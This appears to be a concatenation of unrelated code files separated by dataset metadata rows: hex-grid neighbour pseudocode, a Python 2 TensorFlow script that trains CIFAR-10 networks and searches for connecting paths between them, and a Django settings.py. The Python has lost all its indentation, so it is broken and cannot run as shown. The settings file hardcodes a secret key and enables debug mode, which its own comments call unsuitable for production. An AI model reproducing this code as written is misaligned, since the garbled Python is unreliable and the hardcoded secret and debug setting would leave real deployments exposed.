y = -x-z
NEIGHBOURS::
>>cube<<
var directions = [
Cube(+1, -1, 0), Cube(+1, 0, -1), Cube( 0, +1, -1),
Cube(-1, +1, 0), Cube(-1, 0, +1), Cube( 0, -1, +1)
]
function cube_direction(direction):
return directions[direction]
function cube_neighbor(hex, direction):
return cube_add(hex, cube_direction(direction))
>>axial<<
var directions = [
Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1)
]
function hex_direction(direction):
return directions[direction]
function hex_neighbor(hex, direction):
var dir = hex_direction(direction)
return Hex(hex.q + dir.q, hex.r + dir.r)
>>offset<< (4 different implementations depending on grid type)
>>odd-r<<
var directions = [
[ Hex(+1, 0), Hex( 0, -1), Hex(-1, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ],
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex( 0, +1), Hex(+1, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.row & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>even-r<<
var directions = [
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, 0), Hex( 0, +1), Hex(+1, +1) ],
[ Hex(+1, 0), Hex( 0, -1), Hex(-1, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.row & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>odd-q<<
var directions = [
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, -1), Hex(-1, 0), Hex( 0, +1) ],
[ Hex(+1, +1), Hex(+1, 0), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.col & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>even-q<<
var directions = [
[ Hex(+1, +1), Hex(+1, 0), Hex( 0, -1),
Hex(-1, 0), Hex(-1, +1), Hex( 0, +1) ],
[ Hex(+1, 0), Hex(+1, -1), Hex( 0, -1),
Hex(-1, -1), Hex(-1, 0), Hex( 0, +1) ]
]
function offset_neighbor(hex, direction):
var parity = hex.col & 1
var dir = directions[parity][direction]
return Hex(hex.col + dir.col, hex.row + dir.row)
>>Diagonals<<
var diagonals = [
Cube(+2, -1, -1), Cube(+1, +1, -2), Cube(-1, +2, -1),
Cube(-2, +1, +1), Cube(-1, -1, +2), Cube(+1, -2, +1)
]
function cube_diagonal_neighbor(hex, direction):
return cube_add(hex, diagonals[direction])
| gpl-2.0 | -3,974,613,827,194,157,600 | 25.090278 | 69 | 0.534602 | false | 2.438027 | false | false | false |
danielfreeman11/convex-nets | LaunchScripts/CIFAR10.py | 1 | 29360 | #Imports and model parameters
from __future__ import absolute_import
from __future__ import division
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
#mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
#Simple network: Given three integers a,b,c, [-100,100] chooses three random x-values, and evaluates
#the quadratic function a*x^2 + b*x + c at those values.
import copy
from datetime import datetime
import os.path
import time
import math
import gzip
import os
import re
import sys
import tarfile
from six.moves import urllib
import tensorflow as tf
from tensorflow.models.image.cifar10 import cifar10_input
from tensorflow.models.image.cifar10 import cifar10
for num_run in xrange(1):
alpha,hidden_dim,hidden_dim2 = (.001,4,4)
thresh = .95
if num_run%4 == 0:
thresh = .8
if num_run%4 == 1:
thresh = .6
if num_run%4 == 2:
thresh = .4
if num_run%4 == 3:
thresh = .35
cost_thresh = 1.0
# Parameters
learning_rate = 0.001
training_epochs = 15
#batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
#synapses = []
#from __future__ import print_function
tf.logging.set_verbosity(tf.logging.FATAL)
FLAGS = tf.app.flags.FLAGS
# Basic model parameters.
batch_size = 128
data_dir = '/tmp/cifar10_data'
use_fp16 = False
train_dir= '/tmp/cifar10_train'
max_steps=1000000
num_examples=10000
log_device_placement=False
# Global constants describing the CIFAR-10 data set.
IMAGE_SIZE = cifar10_input.IMAGE_SIZE
NUM_CLASSES = cifar10_input.NUM_CLASSES
NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN
NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = cifar10_input.NUM_EXAMPLES_PER_EPOCH_FOR_EVAL
# Constants describing the training process.
MOVING_AVERAGE_DECAY = 0.9999 # The decay to use for the moving average.
NUM_EPOCHS_PER_DECAY = 350.0 # Epochs after which learning rate decays.
LEARNING_RATE_DECAY_FACTOR = 0.1 # Learning rate decay factor.
INITIAL_LEARNING_RATE = 0.1 # Initial learning rate.
# If a model is trained with multiple GPUs, prefix all Op names with tower_name
# to differentiate the operations. Note that this prefix is removed from the
# names of the summaries when visualizing a model.
TOWER_NAME = 'tower'
DATA_URL = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
models = []
#Testing starting in the same place
#synapse0 = 2*np.random.random((1,hidden_dim)) - 1
#synapse1 = 2*np.random.random((hidden_dim,hidden_dim2)) - 1
#synapse2 = 2*np.random.random((hidden_dim2,1)) - 1
#Function definitions
def func(x,a,b,c):
return x*x*a + x*b + c
def flatten(x):
result = []
for el in x:
if hasattr(el, "__iter__") and not isinstance(el, basestring):
result.extend(flatten(el))
else:
result.append(el)
return result
def generatecandidate4(a,b,c,tot):
candidate = [[np.random.random() for x in xrange(1)] for y in xrange(tot)]
candidatesolutions = [[func(x[0],a,b,c)] for x in candidate]
return (candidate, candidatesolutions)
def synapse_interpolate(synapse1, synapse2, t):
return (synapse2-synapse1)*t + synapse1
def model_interpolate(w1,b1,w2,b2,t):
m1w = w1
m1b = b1
m2w = w2
m2b = b2
mwi = [synapse_interpolate(m1we,m2we,t) for m1we, m2we in zip(m1w,m2w)]
mbi = [synapse_interpolate(m1be,m2be,t) for m1be, m2be in zip(m1b,m2b)]
return mwi, mbi
def InterpBeadError(w1,b1, w2,b2, write = False, name = "00"):
errors = []
#xdat,ydat = generatecandidate4(.5, .25, .1, 1000)
#xdat,ydat = mnist.train.next_batch(1000)
#xdat = mnist.test.images
#ydat = mnist.test.labels
#xdat = np.array(xdat)
#ydat = np.array(ydat)
for tt in xrange(20):
#print tt
#accuracy = 0.
t = tt/20.
thiserror = 0
#x0 = tf.placeholder("float", [None, n_input])
#y0 = tf.placeholder("float", [None, n_classes])
weights, biases = model_interpolate(w1,b1,w2,b2, t)
#interp_model = multilayer_perceptron(w=weights, b=biases)
interp_model = convnet(w=weights, b=biases)
with interp_model.g.as_default():
xdat, ydat = cifar10.inputs(eval_data='test')
logit_test = interp_model.predict(xdat)
top_k_op = tf.nn.in_top_k(logit_test, ydat, 1)
pred = interp_model.predict(xdat)
init = tf.initialize_all_variables()
with tf.Session() as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
num_iter = 20
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
step = 0
while step < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
step += 1
precision = true_count / total_sample_count
print "Accuracy:", precision
#,"\t",tt,weights[0][1][0],weights[0][1][1]
thiserror = 1 - precision
errors.append(thiserror)
if write == True:
with open("f" + str(name) + ".out",'w+') as f:
for e in errors:
f.write(str(e) + "\n")
return max(errors), np.argmax(errors)
def _activation_summary(x):
"""Helper to create summaries for activations.
Creates a summary that provides a histogram of activations.
Creates a summary that measures the sparsity of activations.
Args:
x: Tensor
Returns:
nothing
"""
# Remove 'tower_[0-9]/' from the name in case this is a multi-GPU training
# session. This helps the clarity of presentation on tensorboard.
tensor_name = re.sub('%s_[0-9]*/' % TOWER_NAME, '', x.op.name)
tf.histogram_summary(tensor_name + '/activations', x)
tf.scalar_summary(tensor_name + '/sparsity', tf.nn.zero_fraction(x))
def _variable_on_cpu(name, shape, initializer):
"""Helper to create a Variable stored on CPU memory.
Args:
name: name of the variable
shape: list of ints
initializer: initializer for Variable
Returns:
Variable Tensor
"""
with tf.device('/cpu:0'):
dtype = tf.float16 if False else tf.float32
var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)
return var
def _variable_with_weight_decay(name, shape, stddev, wd):
"""Helper to create an initialized Variable with weight decay.
Note that the Variable is initialized with a truncated normal distribution.
A weight decay is added only if one is specified.
Args:
name: name of the variable
shape: list of ints
stddev: standard deviation of a truncated Gaussian
wd: add L2Loss weight decay multiplied by this float. If None, weight
decay is not added for this Variable.
Returns:
Variable Tensor
"""
dtype = tf.float16 if False else tf.float32
var = _variable_on_cpu(
name,
shape,
tf.truncated_normal_initializer(stddev=stddev, dtype=dtype))
if wd is not None:
weight_decay = tf.mul(tf.nn.l2_loss(var), wd, name='weight_loss')
tf.add_to_collection('losses', weight_decay)
return var
def distorted_inputs():
"""Construct distorted input for CIFAR training using the Reader ops.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.distorted_inputs(data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
def inputs(eval_data):
"""Construct input for CIFAR evaluation using the Reader ops.
Args:
eval_data: bool, indicating if one should use the train or eval data set.
Returns:
images: Images. 4D tensor of [batch_size, IMAGE_SIZE, IMAGE_SIZE, 3] size.
labels: Labels. 1D tensor of [batch_size] size.
Raises:
ValueError: If no data_dir
"""
if not FLAGS.data_dir:
raise ValueError('Please supply a data_dir')
data_dir = os.path.join(FLAGS.data_dir, 'cifar-10-batches-bin')
images, labels = cifar10_input.inputs(eval_data=eval_data,
data_dir=data_dir,
batch_size=FLAGS.batch_size)
if False:
images = tf.cast(images, tf.float16)
labels = tf.cast(labels, tf.float16)
return images, labels
#Class definitions
class convnet():
def __init__(self, w=0, b=0, ind='00'):
self.index = ind
learning_rate = .001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'c1': _variable_with_weight_decay('c1',shape=[5, 5, 3, 64],stddev=5e-2,wd=0.0),
'c2': _variable_with_weight_decay('c2',shape=[5, 5, 64, 64],stddev=5e-2,wd=0.0),
'fc1': _variable_with_weight_decay('fc1', shape=[2304, 384],stddev=0.04, wd=0.004),
'fc2': _variable_with_weight_decay('fc2', shape=[384, 192],stddev=0.04, wd=0.004),
'out': _variable_with_weight_decay('out', [192, NUM_CLASSES],stddev=1/192.0, wd=0.0)
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': _variable_on_cpu('b1', [64], tf.constant_initializer(0.0)),
'b2': _variable_on_cpu('b2', [64], tf.constant_initializer(0.1)),
'b3': _variable_on_cpu('b3', [384], tf.constant_initializer(0.1)),
'b4': _variable_on_cpu('b4', [192], tf.constant_initializer(0.1)),
'out': _variable_on_cpu('bo', [NUM_CLASSES],tf.constant_initializer(0.0))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
else:
self.weights = {
'c1': tf.Variable(w[0]),
'c2': tf.Variable(w[1]),
'fc1': tf.Variable(w[2]),
'fc2': tf.Variable(w[3]),
'out': tf.Variable(w[4])
}
self.weightslist = [self.weights['c1'],self.weights['c2'],self.weights['fc1'],self.weights['fc2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'b3': tf.Variable(b[2]),
'b4': tf.Variable(b[3]),
'out': tf.Variable(b[4])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['b3'],self.biases['b4'],self.biases['out']]
self.saver = tf.train.Saver()
def predict(self, x):
with self.g.as_default():
layer_1 = tf.nn.conv2d(x, self.weights['c1'], [1, 1, 1, 1], padding='SAME')
layer_1 = tf.nn.bias_add(layer_1, self.biases['b1'])
layer_1 = tf.nn.relu(layer_1, name='layer_1')
#_activation_summary(layer_1)
pool_1 = tf.nn.max_pool(layer_1, ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],padding='SAME', name='pool1')
norm_1 = tf.nn.lrn(pool_1, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm1')
layer_2 = tf.nn.conv2d(norm_1, self.weights['c2'], [1, 1, 1, 1], padding='SAME')
layer_2 = tf.nn.bias_add(layer_2, self.biases['b2'])
layer_2 = tf.nn.relu(layer_2, name='layer_2')
#_activation_summary(layer_2)
norm_2 = tf.nn.lrn(layer_2, 4, bias=1.0, alpha=0.001 / 9.0, beta=0.75,name='norm2')
pool_2 = tf.nn.max_pool(norm_2, ksize=[1, 3, 3, 1],strides=[1, 2, 2, 1], padding='SAME', name='pool2')
reshape = tf.reshape(pool_2, [FLAGS.batch_size, -1])
layer_3 = tf.nn.relu(tf.matmul(reshape, self.weights['fc1']) + self.biases['b3'], name='fc1')
#_activation_summary(layer_3)
layer_4 = tf.nn.relu(tf.matmul(layer_3, self.weights['fc2']) + self.biases['b4'], name='fc2')
#_activation_summary(layer_4)
out_layer = tf.add(tf.matmul(layer_4, self.weights['out']), self.biases['out'], name='out')
#_activation_summary(out)
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
class multilayer_perceptron():
#weights = {}
#biases = {}
def __init__(self, w=0, b=0, ind='00'):
self.index = ind #used for reading values from file
#See the filesystem convention below (is this really necessary?)
#I'm going to eschew writing to file for now because I'll be generating too many files
#Currently, the last value of the parameters is stored in self.params to be read
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
# Network Parameters
n_hidden_1 = 256 # 1st layer number of features
n_hidden_2 = 256 # 2nd layer number of features
n_input = 784 # Guess quadratic function
n_classes = 10 #
self.g = tf.Graph()
self.params = []
with self.g.as_default():
#Note that by default, weights and biases will be initialized to random normal dists
if w==0:
self.weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
else:
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
self.saver = tf.train.Saver()
def UpdateWeights(self, w, b):
with self.g.as_default():
self.weights = {
'h1': tf.Variable(w[0]),
'h2': tf.Variable(w[1]),
'out': tf.Variable(w[2])
}
self.weightslist = [self.weights['h1'],self.weights['h2'],self.weights['out']]
self.biases = {
'b1': tf.Variable(b[0]),
'b2': tf.Variable(b[1]),
'out': tf.Variable(b[2])
}
self.biaseslist = [self.biases['b1'],self.biases['b2'],self.biases['out']]
def predict(self, x):
with self.g.as_default():
layer_1 = tf.add(tf.matmul(x, self.weights['h1']), self.biases['b1'])
layer_1 = tf.nn.relu(layer_1)
# Hidden layer with RELU activation
layer_2 = tf.add(tf.matmul(layer_1, self.weights['h2']), self.biases['b2'])
layer_2 = tf.nn.relu(layer_2)
# Output layer with linear activation
out_layer = tf.matmul(layer_2, self.weights['out']) + self.biases['out']
return out_layer
def ReturnParamsAsList(self):
with self.g.as_default():
with tf.Session() as sess:
# Restore variables from disk
self.saver.restore(sess, "/home/dfreeman/PythonFun/tmp/model"+str(self.index)+".ckpt")
return sess.run(self.weightslist), sess.run(self.biaseslist)
class WeightString:
def __init__(self, w1, b1, w2, b2, numbeads, threshold):
self.w1 = w1
self.w2 = w2
self.b1 = b1
self.b2 = b2
#self.w2, self.b2 = m2.params
self.AllBeads = []
self.threshold = threshold
self.AllBeads.append([w1,b1])
for n in xrange(numbeads):
ws,bs = model_interpolate(w1,b1,w2,b2, (n + 1.)/(numbeads+1.))
self.AllBeads.append([ws,bs])
self.AllBeads.append([w2,b2])
self.ConvergedList = [False for f in xrange(len(self.AllBeads))]
self.ConvergedList[0] = True
self.ConvergedList[-1] = True
def SpringNorm(self, order):
totalweights = 0.
totalbiases = 0.
totaltotal = 0.
#Energy between mobile beads
for i,b in enumerate(self.AllBeads):
if i < len(self.AllBeads)-1:
#print "Tallying energy between bead " + str(i) + " and bead " + str(i+1)
subtotalw = 0.
subtotalb = 0.
#for j in xrange(len(b)):
subtotalw += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][0]),flatten(self.AllBeads[i+1][0])),ord=order)#/len(self.beads[0][j])
#for j in xrange(len(b)):
subtotalb += np.linalg.norm(np.subtract(flatten(self.AllBeads[i][1]),flatten(self.AllBeads[i+1][1])),ord=order)#/len(self.beads[0][j])
totalweights+=subtotalw
totalbiases+=subtotalb
totaltotal+=subtotalw + subtotalb
weightdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][0]),flatten(self.AllBeads[-1][0])),ord=order)
biasdist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0][1]),flatten(self.AllBeads[-1][1])),ord=order)
totaldist = np.linalg.norm(np.subtract(flatten(self.AllBeads[0]),flatten(self.AllBeads[-1])),ord=order)
return [totalweights,totalbiases,totaltotal, weightdist, biasdist, totaldist]#/len(self.beads)
def SGDBead(self, bead, thresh, maxindex):
finalerror = 0.
#thresh = .05
# Parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1
curWeights, curBiases = self.AllBeads[bead]
#test_model = multilayer_perceptron(w=curWeights, b=curBiases)
test_model = convnet(w=curWeights, b=curBiases)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
self.AllBeads[bead]=test_model.params
finalerror = 1 - precision
print ("Final bead error: ",str(finalerror))
step += 1
return finalerror
#Model generation
#copy_model = multilayer_perceptron(ind=0)
copy_model = convnet(ind=0)
for ii in xrange(2):
'''weights = {
'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
'b1': tf.Variable(tf.random_normal([n_hidden_1])),
'b2': tf.Variable(tf.random_normal([n_hidden_2])),
'out': tf.Variable(tf.random_normal([n_classes]))
}'''
# Construct model with different initial weights
#test_model = multilayer_perceptron(ind=ii)
test_model = convnet(ind=ii)
#Construct model with same initial weights
#test_model = copy.copy(copy_model)
#test_model.index = ii
#print test_model.weights
models.append(test_model)
with test_model.g.as_default():
global_step = tf.Variable(0, trainable=False)
# Get images and labels for CIFAR-10.
images, labels = cifar10.distorted_inputs()
test_images, test_labels = cifar10.inputs(eval_data='test')
# Build a Graph that computes the logits predictions from the
# inference model.
logits = test_model.predict(images)
logit_test = test_model.predict(test_images)
# Calculate loss.
loss = cifar10.loss(logits, labels)
# Build a Graph that trains the model with one batch of examples and
# updates the model parameters.
train_op = cifar10.train(loss, global_step)
top_k_op = tf.nn.in_top_k(logit_test, test_labels, 1)
# Build an initialization operation to run below.
init = tf.initialize_all_variables()
# Start running operations on the Graph.
#sess = tf.Session(config=tf.ConfigProto(
# log_device_placement=FLAGS.log_device_placement))
with tf.Session(config=tf.ConfigProto(
log_device_placement=False)) as sess:
sess.run(init)
tf.train.start_queue_runners(sess=sess)
step = 0
stopcond = True
while step < max_steps and stopcond:
start_time = time.time()
_, loss_value = sess.run([train_op, loss])
duration = time.time() - start_time
assert not np.isnan(loss_value), 'Model diverged with loss = NaN'
if step % 10 == 0:
num_examples_per_step = batch_size
examples_per_sec = num_examples_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f examples/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
examples_per_sec, sec_per_batch))
if step % 100 == 0:
num_iter = int(math.ceil(num_examples / batch_size))
true_count = 0 # Counts the number of correct predictions.
total_sample_count = num_iter * batch_size
stepp = 0
while stepp < num_iter:
predictions = sess.run([top_k_op])
true_count += np.sum(predictions)
stepp += 1
# Compute precision @ 1.
precision = true_count / total_sample_count
print('%s: precision @ 1 = %.3f' % (datetime.now(), precision))
if precision > 1 - thresh:
stopcond = False
test_model.params = sess.run(test_model.weightslist), sess.run(test_model.biaseslist)
step += 1
#Connected components search
#Used for softening the training criteria. There's some fuzz required due to the difference in
#training error between test and training
thresh_multiplier = 1.1
results = []
connecteddict = {}
for i1 in xrange(len(models)):
connecteddict[i1] = 'not connected'
test = WeightString(models[0].params[0],models[0].params[1],models[1].params[0],models[1].params[1],1,1)
for i1 in xrange(len(models)):
print i1
for i2 in xrange(len(models)):
if i2 > i1 and ((connecteddict[i1] != connecteddict[i2]) or (connecteddict[i1] == 'not connected' or connecteddict[i2] == 'not connected')) :
#print "slow1?"
#print i1,i2
#print models[0]
#print models[1]
#print models[0].params
#print models[1].params
#test = WeightString(models[i1].params[0],models[i1].params[1],models[i2].params[0],models[i2].params[1],1,1)
training_threshold = thresh
depth = 0
d_max = 10
#Check error between beads
#Alg: for each bead at depth i, SGD until converged.
#For beads with max error along path too large, add another bead between them, repeat
#Keeps track of which indices to check the interpbeaderror between
newindices = [0,1]
while (depth < d_max):
print newindices
#print "slow2?"
#X, y = GenTest(X,y)
counter = 0
for i,c in enumerate(test.ConvergedList):
if c == False:
#print "slow3?"
error = test.SGDBead(i, .98*training_threshold, 20)
#print "slow4?"
#if counter%5000==0:
# print counter
# print error
test.ConvergedList[i] = True
print test.ConvergedList
interperrors = []
interp_bead_indices = []
for b in xrange(len(test.AllBeads)-1):
if b in newindices:
e = InterpBeadError(test.AllBeads[b][0],test.AllBeads[b][1], test.AllBeads[b+1][0], test.AllBeads[b+1][1])
interperrors.append(e)
interp_bead_indices.append(b)
print interperrors
if max([ee[0] for ee in interperrors]) < thresh_multiplier*training_threshold:
depth = 2*d_max
#print test.ConvergedList
#print test.SpringNorm(2)
#print "Done!"
else:
del newindices[:]
#Interperrors stores the maximum error on the path between beads
#shift index to account for added beads
shift = 0
for i, ie in enumerate(interperrors):
if ie[0] > thresh_multiplier*training_threshold:
k = interp_bead_indices[i]
ws,bs = model_interpolate(test.AllBeads[k+shift][0],test.AllBeads[k+shift][1],\
test.AllBeads[k+shift+1][0],test.AllBeads[k+shift+1][1],\
ie[1]/20.)
test.AllBeads.insert(k+shift+1,[ws,bs])
test.ConvergedList.insert(k+shift+1, False)
newindices.append(k+shift+1)
newindices.append(k+shift)
shift+=1
#print test.ConvergedList
#print test.SpringNorm(2)
#print d_max
depth += 1
if depth == 2*d_max:
results.append([i1,i2,test.SpringNorm(2),"Connected"])
if connecteddict[i1] == 'not connected' and connecteddict[i2] == 'not connected':
connecteddict[i1] = i1
connecteddict[i2] = i1
if connecteddict[i1] == 'not connected':
connecteddict[i1] = connecteddict[i2]
else:
if connecteddict[i2] == 'not connected':
connecteddict[i2] = connecteddict[i1]
else:
if connecteddict[i1] != 'not connected' and connecteddict[i2] != 'not connected':
hold = connecteddict[i2]
connecteddict[i2] = connecteddict[i1]
for h in xrange(len(models)):
if connecteddict[h] == hold:
connecteddict[h] = connecteddict[i1]
else:
results.append([i1,i2,test.SpringNorm(2),"Disconnected"])
#print results[-1]
uniquecomps = []
totalcomps = 0
for i in xrange(len(models)):
if not (connecteddict[i] in uniquecomps):
uniquecomps.append(connecteddict[i])
if connecteddict[i] == 'not connected':
totalcomps += 1
#print i,connecteddict[i]
notconoffset = 0
if 'not connected' in uniquecomps:
notconoffset = -1
#with open('DSSCIFAR.' + str(thresh) + '.' + str(num_run) + '.out','w+') as f:
print "Thresh: " + str(thresh) + "\n"
print "Comps: " + str(len(uniquecomps) + notconoffset + totalcomps) + "\n"
connsum = []
for r in results:
if r[3] == "Connected":
connsum.append(r[2])
#print r[2]
print "***\n"
print str(len(test.AllBeads)) + "\n"
print "\t".join([str(s) for s in connsum[0]])
#print np.average(connsum)
#print np.std(connsum)
| mit | -1,522,237,430,314,512,100 | 29.982571 | 144 | 0.615123 | false | 2.942473 | true | false | false |
neqelr17/banknotes | banknotes/settings.py | 1 | 3207 | """
Django settings for banknotes project.
Generated by 'django-admin startproject' using Django 1.9.7.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'm@hb1flp0z#d@+#(l=2^ox!(945_4o7(q5$3c2___h18$m=ad5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'budget.apps.BudgetConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'banknotes.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'banknotes.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
